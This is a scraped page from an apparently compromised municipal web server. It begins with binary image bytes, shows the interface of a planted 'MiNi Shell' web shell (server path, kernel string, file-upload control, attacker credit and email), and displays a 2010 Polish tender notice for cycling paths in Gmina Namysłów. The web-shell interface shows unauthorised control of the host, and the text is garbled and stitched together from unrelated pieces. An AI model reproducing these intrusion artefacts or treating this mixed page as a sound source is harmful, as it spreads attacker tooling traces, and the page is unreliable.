JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100322/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100322/79724-N-2010.html

<p class="kh_header"><b>Namysłów: Budowa przyrodniczo-krajoznawczych ścieżek rowerowych w Gminie Namysłów</b><br>
<b>Numer ogłoszenia: 79724 - 2010; data zamieszczenia: 22.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Namysłów, reprezentowana przez Burmistrza Namysłowa , ul. Stanisława Dubois 3, 46-100 Namysłów, woj. opolskie, tel. 077 4190359, faks 077 4104841.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.namyslow.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa przyrodniczo-krajoznawczych ścieżek rowerowych w Gminie Namysłów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Nazwa i kod wg Wspólnego Słownika Zamówień:
Roboty budowlane w zakresie ścieżek rowerowych - 45233162-2
Przedmiot zamówienia obejmuje budowę przyrodniczo-krajoznawczych ścieżek rowerowych w Gminie Namysłów. Ścieżka rowerowa nr 1 - Smarchowice Wielkie, Nowe Smarchowice wraz z przysiółkami Młynek, Stanek, Zielony Dąb, Hałderze, Bławaciska i Apostoły oraz ścieżka rowerowa nr 2 - Józefków, Michalice, Kamienna.
1. Ścieżka rowerowa nr 1 a)	należy wyrównać i wzmocnić istniejącą nawierzchnię gruntową poprzez profilowanie i zawałowanie istniejącej nawierzchni, o łącznej powierzchni: 46.497,5 m2, b) należy wykonać podbudowę przy użyciu tłucznia kamiennego twardego - grubość warstwy po zagęszczeniu 7 cm, wraz z zawałowaniem podbudowy o łącznej powierzchni: 46.497,5 m2, 
c) należy wykonać nawierzchnię z tłucznia kamiennego wraz z zawałowaniem i wyprofilowaniem  - warstwa górna - grubość po zagęszczeniu 11 cm o łącznej powierzchni: 46.497,5 m2, d) należy zakupić i zamontować słupki do znaków drogowych z rur stalowych dodatkowo zabezpieczonych przed działaniem niekorzystnych warunków atmosferycznych o śr. 50 mm. Słupki należy wkopać na głębokość min. 50 cm i zabetonować w miejscu wskazanym przez Zamawiającego w ilości 70 sztuk, e) należy zakupić i zamontować tablice znaków drogowych informacyjnych (zgodnie z załącznikiem nr 1) o wymiarach min. 20x20 cm (pow. tablicy nie większa niż 0,3 m2). Tło tablicy białe, rodzaj czcionki Arial, wielkość czcionki uzależniona od długości tekstu, z zachowaniem proporcji pomiędzy logami Programu, elementami graficznymi i tekstem. Tablice kierunkowych znaków drogowych należy wykonać z blachy nierdzewnej, ocynkowanej o grubości ok. 1.2 mm z podwójnie giętą krawędzią. Tablicę należy przymocować do słupków z rur stalowych za pomocą specjalistycznych uchwytów nieuszkadzających tablicy. Plecy tablicy znaków należy pomalować farbą proszkową zabezpieczająca przed działaniem niekorzystnych warunków atmosferycznych. Tablice znaków drogowych należy wykonać zgodnie z obowiązującymi przepisami oraz w technologii zapewniającej trwałość tablic znaków drogowych na okres min. 5 lat w ilości 
58 sztuk, w kolorze czerwonym, w tym: kierunek jazdy na wprost w ilości 17 szt., 
kierunek jazdy w prawo w ilości 18 szt., kierunek jazdy w lewo w ilości 18 szt., 
kierunek jazdy prawo-lewo w ilości 1 szt., kierunek jazdy prosto-prawo w ilości 1szt., kierunek jazdy prosto-lewo w ilości 1 szt., tablica z napisem Początek w ilości 1 szt., tablica z napisem Koniec w ilości 1 szt. Kierunkowe tablice znaków drogowych należy ustawić w miejscu wskazanym przez Zamawiającego. Zamawiający zastrzega sobie prawo do zmiany treści kierunkowych tablic znaków drogowych oraz logotypów, należy zakupić i zamontować tablice informacyjne (zgodnie z załącznikiem nr 2) o wymiarach min. 70x90 cm. Tło tablicy białe, rodzaj czcionki Arial, wielkość czcionki uzależniona od długości tekstu, z zachowaniem proporcji pomiędzy logami Programu, elementami graficznymi (mapka)
i tekstem. Tablice należy wykonać z blachy nierdzewnej, ocynkowanej o grubości ok. 1.2 mm z podwójnie giętą krawędzią. Tablice należy wykleić folią odblaskową. Plecy tablicy informacyjnej należy pomalować farbą proszkową zabezpieczającą przed działaniem niekorzystnych warunków atmosferycznych. Tablice należy przymocować do słupków z rur stalowych za pomocą specjalistycznych uchwytów nie uszkadzających tablicy. Tablice informacyjne należy wykonać zgodnie z obowiązującymi przepisami oraz w technologii zapewniającej trwałość tablic na okres min. 5 lat. Tablice informacyjne należy ustawić w miejscu wskazanym przez Zamawiającego w ilości 6 sztuk. Zamawiający zastrzega sobie prawo do zmiany treści tablic informacyjnych oraz logotypów, g) należy zakupić i zamontować ławki dł. 2 m. z bali drewnianych z oparciem - fundament betonowy z betonu min. B10, 25x25x50 cm (2 szt., 0,06 m3), kotwy - ceownik 5x5 cm, dł.100 cm (łącznie 
na 1 fundament) 2 szt., 2.00 mb, kotwy - płaskownik 5x0,5 cm, dł. 35 cm 2 szt., 0,7 mb, podstawa - okrąglak śr. 25 cm, dł. 50 cm (2szt., 0,049 m3), siedzisko - ? okrąglaka śr. 25 cm, dł. 200 cm (2 szt., 0,098 m3), oparcie - o wymiarach min. 5 cm x 25 cm x 200 cm (1 szt., 0,025 m3) oparcie - okrąglak śr. 12 cm, dł. 75 cm (2szt., 0,017 m3) elementy z drewna świerkowego z drewna dokładnie obrobionego i impregnowanego, elementy drewniane należy pokryć powłokami impregnującymi drewno i zachowującymi rysunek słojów drewna i barwiącymi je na kolor oliwkowy. Ławki, w ilości 6 sztuk, należy ustawić w miejscu wskazanym przez Zamawiającego, h) należy zakupić i zamontować wiaty wypoczynkowe ze stołem i ławkami 2x2 m (ławostół zadaszony - dach): krokwie z obiciem deskami (świerk) o grubości min. 2,7 cm montowane na zakładkę, długość zadaszenia 270 cm, długość ławostołu 200 cm, szerokość blatu stołu około 80 cm, szerokość siedzisk około 30 cm, elementy drewniane z drewna struganego i impregnowanego preparatami ogniochronnymi (bezbarwnymi), elementy drewniane należy dodatkowo pokryć powłokami impregnującymi drewno i zachowującymi rysunek słojów drewna i barwiącymi je na kolor oliwkowy, drewniane elementy konstrukcyjne łączone ze sobą w sposób ciesielski (czopy i drewniane kołki) wiata posadowiona poprzez słupy wykonane z drewna dębowego, wkopane na głębokość 1,2 m w grunt rodzimy, część słupa poniżej poziomu gruntu należy dodatkowo pokryć powłoką wodochronną. Wiatę wypoczynkową ze stołem i ławkami 2x2, w ilości 6 sztuk, należy ustawić w miejscu wskazanym przez Zamawiającego, i) należy zakupić i zamontować kosze na śmieci z drewna świerkowego, elementy drewniane należy pokryć powłokami impregnującymi drewno i zachowującymi rysunek słojów drewna i barwiącymi je na kolor oliwkowy o pojemności 100 l. Kosze na śmieci, w ilości 6 sztuk, należy ustawić w miejscu wskazanym przez Zamawiającego,
j) należy zakupić i zamontować stojaki na rowery, na 10 miejsc postojowych każdy, wykonane z bala drewnianego, montowane na kotwach metalowych i dodatkowo stabilizowane w gruncie betonem, elementy z drewna świerkowego z drewna dokładnie obrobionego i impregnowanego, elementy drewniane należy pokryć powłokami impregnującymi drewno i zachowującymi rysunek słojów drewna i barwiącymi je na kolor oliwkowy. Stojaki na rowery, w ilości 6 sztuk, należy ustawić w miejscu wskazanym przez Zamawiającego.
2. Ścieżka rowerowa nr 2 a) należy wyrównać i wzmocnić istniejącą nawierzchnię gruntową poprzez profilowanie i zawałowanie istniejącej nawierzchni, o łącznej powierzchni: 10.710,0 m2, b) należy wykonać podbudowę przy użyciu tłucznia kamiennego twardego - grubość warstwy po zagęszczeniu 7 cm, wraz z zawałowaniem podbudowy o łącznej powierzchni: 10.710,0 m2, 
c) należy wykonać nawierzchnię z tłucznia kamiennego wraz z zawałowaniem i wyprofilowaniem-warstwa górna - grubość po zagęszczeniu 11 cm o łącznej powierzchni: 10.710,0 m2, d) należy zakupić i zamontować słupki do znaków drogowych z rur stalowych dodatkowo zabezpieczonych przed działaniem niekorzystnych warunków atmosferycznych o śr. 50 mm. Słupki należy wkopać na głębokość min. 50 cm i zabetonować w miejscu wskazanym przez Zamawiającego w ilości 28 sztuk, e) należy zakupić i zamontować tablice znaków drogowych informacyjnych (zgodnie z załącznikiem nr 3) o wymiarach min. 20x20 cm (pow. tablicy nie większa niż 0,3 m2). Tło tablicy białe, rodzaj czcionki Arial, wielkość czcionki uzależniona od długości tekstu, z zachowaniem proporcji pomiędzy logami Programu, elementami graficznymi i tekstem. Tablice należy wykonać z blachy nierdzewnej, ocynkowanej o grubości ok. 1.2 mm z podwójnie giętą krawędzią. Tablica należy przymocować do słupków z rur stalowych za pomocą specjalistycznych uchwytów nieuszkadzających tablicy. Plecy tablicy znaków należy pomalować farbą proszkową zabezpieczająca przed działaniem niekorzystnych warunków atmosferycznych. Tablice znaków drogowych należy wykonać zgodnie z obowiązującymi przepisami oraz w technologii zapewniającej trwałość tablic znaków drogowych na okres min. 5 lat, w ilości 22 sztuk, w kolorze niebieskim, w tym: kierunek jazdy na wprost w ilości 4 szt., kierunek jazdy w prawo w ilości 5 szt., kierunek jazdy w lewo w ilości 6 szt., kierunek jazdy prawo-lewo w ilości 1 szt., kierunek jazdy prosto-prawo w ilości 1 szt., kierunek jazdy prosto-lewo w ilości 1 szt., tablica z napisem Początek w ilości 2 szt., tablica z napisem Koniec w ilości 2 szt. Kierunkowe tablice znaków drogowych należy ustawić w miejscu wskazanym przez Zamawiającego. Zamawiający zastrzega sobie prawo do zmiany treści kierunkowych tablic znaków drogowych oraz logotypów, f) należy zakupić i zamontować tablice informacyjne (zgodnie z załącznikiem nr 4) o wymiarach 50x59 cm. Tło tablicy białe, rodzaj czcionki Arial, wielkość czcionki uzależniona od długości tekstu, z zachowaniem proporcji pomiędzy logami Programu, elementami graficznymi (mapka) i tekstem. Tablice należy wykonać z blachy nierdzewnej, ocynkowanej o grubości ok. 1.2 mm z podwójnie giętą krawędzią. Tablice należy wykleić folią odblaskową. Plecy tablicy informacyjnej należy pomalować farbą proszkową zabezpieczającą przed działaniem niekorzystnych warunków atmosferycznych. Tablicę należy przymocować do słupków z rur stalowych za pomocą specjalistycznych uchwytów nieuszkadzających tablicy. Tablice informacyjne należy wykonać zgodnie z obowiązującymi przepisami oraz w technologii zapewniającej trwałość tablic na okres min. 5 lat. Tablice informacyjne należy ustawić w miejscu wskazanym przez Zamawiającego w ilości 3 sztuk. Zamawiający zastrzega sobie prawo 
do zmiany treści tablic informacyjnych oraz logotypów,
g) należy zakupić i zamontować ławki dł. 2 m. z bali drewnianych z oparciem - fundament betonowy z betonu min. B10, 25x25x50 cm (2 szt., 0,06 m3), kotwy - ceownik 5x5 cm, dł. 100 cm (łącznie na 1 fundament) 2 szt., 2.00 mb, kotwy - płaskownik 5x0,5 cm, dł. 35 cm 2 szt., 0,7 mb, podstawa - okrąglak śr. 25 cm, dł. 50 cm (2szt., 0,049 m3), siedzisko - ? okrąglaka śr. 25 cm, dł. 200 cm (2 szt., 0,098 m3), oparcie - o wymiarach min. 5 cm x 25 cm x 200 cm (1 szt., 0,025 m3), oparcie - okrąglak śr. 12 cm, dł. 75 cm (2szt., 0,017 m3) elementy 
z drewna świerkowego z drewna dokładnie obrobionego i impregnowanego, elementy drewniane należy pokryć powłokami impregnującymi drewno i zachowującymi rysunek słojów drewna i barwiącymi je na kolor oliwkowy. Ławki, w ilości 3 sztuk, należy ustawić w miejscu wskazanym przez Zamawiającego,
h) należy zakupić i zamontować wiaty wypoczynkowe ze stołem i ławkami 2x2 m (ławostół zadaszony - dach): krokwie z obiciem deskami (świerk) o grubości min. 2,7 cm montowane na zakładkę, długość zadaszenia 270 cm, długość ławostołu 200 cm, szerokość blatu stołu około 80 cm, szerokość siedzisk około 30 cm, elementy drewniane z drewna struganego i impregnowanego preparatami ogniochronnymi (bezbarwnymi), elementy drewniane należy dodatkowo pokryć powłokami impregnującymi drewno i zachowującymi rysunek słojów drewna i barwiącymi je na kolor oliwkowy, drewniane elementy konstrukcyjne łączone ze sobą 
w sposób ciesielski (czopy i drewniane kołki) wiata posadowiona poprzez słupy wykonane z drewna dębowego, wkopane na głębokość 1,2 m w grunt rodzimy, część słupa poniżej poziomu gruntu należy dodatkowo pokryć powłoką wodochronną. Wiaty wypoczynkowe ze stołem i ławkami 2x2, w ilości 3 sztuk, należy ustawić w miejscu wskazanym przez Zamawiającego, i) należy zakupić i zamontować kosze na śmieci z drewna świerkowego, elementy drewniane należy pokryć powłokami impregnującymi drewno i zachowującymi rysunek słojów drewna  i barwiącymi je na kolor oliwkowy o pojemności 100 l. Kosze na śmieci, w ilości 3 sztuk, należy ustawić w miejscu wskazanym przez Zamawiającego,
j) należy zakupić i zamontować stojaki na rowery, na 10 miejsc postojowych każdy, wykonane z bala drewnianego, montowane na kotwach metalowych i dodatkowo stabilizowane w gruncie betonem, elementy z drewna świerkowego z drewna dokładnie obrobionego i impregnowanego, elementy drewniane należy pokryć powłokami impregnującymi drewno i zachowującymi rysunek słojów drewna i barwiącymi je na kolor oliwkowy. Stojaki na rowery, w ilości 3 sztuk, należy ustawić w miejscu wskazanym przez Zamawiającego. Wymagania dodatkowe:
wykonawca ponosi koszty projektu organizacji ruchu, oznakowania i zabezpieczenia na czas trwania robót wykonawca ponosi pełną odpowiedzialność za ewentualne zakłócenia w ruchu drogowym oraz szkody i straty powstałe w wyniku prowadzenia robót, roboty należy prowadzić umożliwiając dojście i dojazd mieszkańcom do przyległych posesji, wszystkie materiały zastosowane przy wykonaniu w/w robót winny posiadać atesty, certyfikaty i aprobaty techniczne dopuszczające do stosowania w obiektach użyteczności publicznej (należy dostarczyć Zamawiającemu), po zakończeniu robót należy wywieźć gruz i uprzątnąć plac budowy, na w/w roboty wykonawca udzieli gwarancji na okres 3 lat licząc od daty odbioru protokołu robót. należy sporządzić harmonogram robót i przedłożyć go Zamawiającemu. Roboty objęte umową należy wykonać zgodnie ze: szczegółowymi specyfikacjami technicznymi, przedmiarem robót, ustawą z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. z 2006 r., Nr 156, poz. 1118 
z późn. zm), ustawą z dnia 16 kwietnia 2004 roku o wyrobach budowlanych  (Dz. U z 2004 r. Nr 92, poz.881 z późn. zm),ustawą z dnia 10 kwietnia 1997 roku Prawo energetyczne  (Dz. U z 2006 r. Nr 89, poz. 625 z późn. zm), rozporządzeniem ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U z 1999 r. Nr 43, poz. 430)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.62-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść wadium w wysokości 10.000,00 zł (słownie złotych:: dziesięć tysięcy 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunków wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, dat i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone - Wykonawca musi wykazać wykonanie co najmniej dwóch robót w podobnym zakresie - do każdej pozycji wykazu musi być załączony dokument potwierdzający, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych 
(przez Wykonawcę, podmioty występujące wspólnie) dokumentów jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu według formuły spełnia - nie spełnia. Przy ocenie spełnienia warunków udziału przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia wielkości stanowiące o spełnieniu warunków będą zsumowane.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.namyslow.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikacja istotnych warunków zamówienia dostępna będzie w siedzibie zamawiajacego, budynek B, pokój nr 26 lub za zaliczeniem pocztowym. Siwz jest odplatna (24,40 zł).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.04.2010 godzina 11:00, miejsce: Oferty należy skladać w siedzibie Zamawiającego - Urzad Miejski w Namysłowie, ul. Dubois 3, budynek B, pokój nr 26.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Rozwoju Obszarów Wiejskich na lata 2007-2013 w ramach środków Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów wiejskich.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com